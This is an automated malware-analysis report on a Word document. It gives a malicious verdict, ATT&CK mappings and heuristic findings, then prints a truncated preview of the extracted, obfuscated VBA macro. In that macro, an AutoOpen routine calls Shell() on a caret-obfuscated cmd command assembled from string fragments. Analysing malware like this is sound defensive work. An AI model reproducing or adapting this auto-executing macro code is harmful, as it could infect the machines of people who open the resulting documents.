Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The obfuscated nature of the script and lack of specific indicators prevent definitive family attribution.
Heuristics (6)
- VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17233 bytes |

SHA-256: 73abcabb26f6f94ef5c71b1ece44aa7f9529de49d921f0c47399ae68b2b98cf2

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ZIkzCIzbvIrB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wCGXOfaZ()
On Error Resume Next
For smvIH = jfwFj To 22016
PTUkOZ = (BfwVo - ChrW(62339 * 98767) * ilLQFZ * CInt(ijJlE + Sqr(56011)) + 27580 - 62129 / 74417 - CDate(YBrJjj - 95703 + 13128 - Hex(EMnaT / 52396)) + (zzLtS * Tan(VNpla)))
Next
For VlnzMY = iHaBB To 27301
AVorI = (KhdQVs - ChrW(57695 * 35448) * dTvJUk * CInt(QNbCD + Sqr(93494)) + 28307 - 47285 / 92676 - CDate(fJFAZ - 96085 + 55632 - Hex(TnIWiT / 88958)) + (wdGGst * Tan(hEbPG)))
Next
wCGXOfaZ = LKzJvaAPp + Shell(NZQjPnTULhw + Chr(uEUovOC + vbKeyC + pBNLkffJh) + zYYEQk + vCXvczL + YzuwE + mAVdVVBER + QFzDhCuw + PoIOpOQuc + QzAijBBFdM + pLLfET, fIDCWzhSq + 0 + vKPrlrPvp)
For NTFULN = MfEVS To 47075
zLuiI = (GzlRq - ChrW(32881 * 72497) * YwwhWw * CInt(UCBSF + Sqr(48979)) + 70703 - 37754 / 48162 - CDate(nTsbWJ - 84949 + 15228 - Hex(fPhniu / 53151)) + (oiFnvZ * Tan(cIsQCi)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For iMjCz = JCmGaZ To 36419
mPXYip = (kTzruz - ChrW(98169 * 26815) * bFPJl * CInt(Gbzib + Sqr(72808)) + 92082 - 99003 / 26619 - CDate(HFpsV - 84723 + 46207 - Hex(ZttjKD / 91197)) + (oViUJ * Tan(EQIva)))
Next
wCGXOfaZ
For OKpTjV = rJVvjh To 41560
scXRun = (zaVtM - ChrW(96024 * 1977) * kZRcf * CInt(EZApQ + Sqr(6609)) + 1470 - 37181 / 50510 - CDate(moYMok - 59042 + 62296 - Hex(wNPwp / 17209)) + (qkkVSF * Tan(WoDXbi)))
Next
End Sub
Attribute VB_Name = "QizaGYZokzuk"
Function zYYEQk()
On Error Resume Next
For aBiQfa = inXRmO To 65171
hnDWr = (vHRcjH - ChrW(23487 * 85131) * mpjVn * CInt(lXjSD + Sqr(52121)) + 84891 - 77809 / 57086 - CDate(jrVQw - 24068 + 18530 - Hex(MfuMo / 98160)) + (jqakb * Tan(tulwP)))
Next
UIMJYjAHCm = "md AiLWE" + "RD jzokTpdCiKzL" + "VuZ" + "HiuLsouqiF UT" + "LVEuY & " + " %" + "^c^o^m^" + "S^p^E" + "^c^% %^c^"
For DoEDT = PzQqcQ To 49981
NIIfZj = (zXkRDC - ChrW(12995 * 76280) * jTjsFi * CInt(cbYZz + Sqr(6311)) + 80238 - 27271 / 18796 - CDate(uskmG - 43890 + 63056 - Hex(ERTlPl / 16423)) + (THIkh * Tan(iAfEAJ)))
Next
sjjwwpO = "o^m^S^p^E^c^%" + " " + " /V /" + "c " + " set %muEHA" + "LuIGS" + "UNkGI%=PWXsDv" + "CzBOmJ&&s" + "et %ucanQ"
For whWHtH = DKdzz To 16200
NpqLm = (ojiFZ - ChrW(55835 * 38739) * kGBWW * CInt(IjwiVd + Sqr(89673)) + 16301 - 16770 / 57062 - CDate(lZZUL - 79605 + 85676 - Hex(tvMwQ / 66450)) + (nDSEb * Tan(cItisM)))
Next
DSDbCfXni = "fOSfjsJ%=p&" + "&set %kKOL" + "WcPkFofQ" + "%=o^w&&s" + "et %iSptQwHfU" + "zi"
For IWfbEu = DuqYQJ To 15308
EvkjvF = (rpECjI - ChrW(31863 * 62031) * TcCFWQ * CInt(tVuMsM + Sqr(88123)) + 75584 - 35024 / 36893 - CDate(EztLRk - 35439 + 59184 - Hex(WCKfnO / 678)) + (oGCGn * Tan(rKBtz)))
Next
BRHINYcwMV = "iQki%=WVUw" + "MjwwjCV&&set %V" + "iOojztErwOk%" + "=!%" + "ucanQfOSfj"
For vRjQJM = wHLSms To 49827
qKOZi = (nzLQs - ChrW(31790 * 73369) * BPrUA * CInt(FSuWbf + Sqr(7333)) + 97313 - 53997 / 77942 - CDate(OOwAz - 73676 + 38717 - Hex(RHRYA / 33871)) + (wuFvaR * Tan(fIYQsz)))
Next
UjmszlUmd = "sJ%!&&se" + "t %rrGGm" + "YkZndawnwc%=P" + "nobTMabf" + "&&set %mZJLj" + "jE"
For IpXWAd = pCBdX To 3204
mnutEf = (JsjNzW - ChrW(66238 * 77467) * itWUJS * CInt(BzotHr + Sqr(8040)) + 35193 - 7420 / 31365 - CDate(tUdWo - 34516 + 31551 - Hex(wrJCGU / 2009)) + (SkAhZT * Tan(suQmaR)))
Next
EzcizMT = "FBat%=e^r&&" + "set %zQAdWG" + "NmzIWv%=!%kKOLW" + "cPkFofQ%!" + "&&set %IojnM"
For NJhNpT = MFEDKV To 6827
whZGRl = (DjkZbk - ChrW(54653 * 46213) * phIdzV * CInt(ihbGiw + Sqr(56397)) + 29438 - 96341 / 79904 - CDate(ziNUz - 5914 + 60724 - Hex(wdPrO / 68805)) + (ZOcNas * Tan(nuZqfD)))
Next
PrqcprmSi = "joSQCs%=s" + "&&set %" + "tqzCWqMObQ" + "oOtwJ%=L" + "uwvYhzkPjK" + "&&set %vjGi" + "zonu%=h"
For FUbmj = pRVhEz To 86763
... (truncated)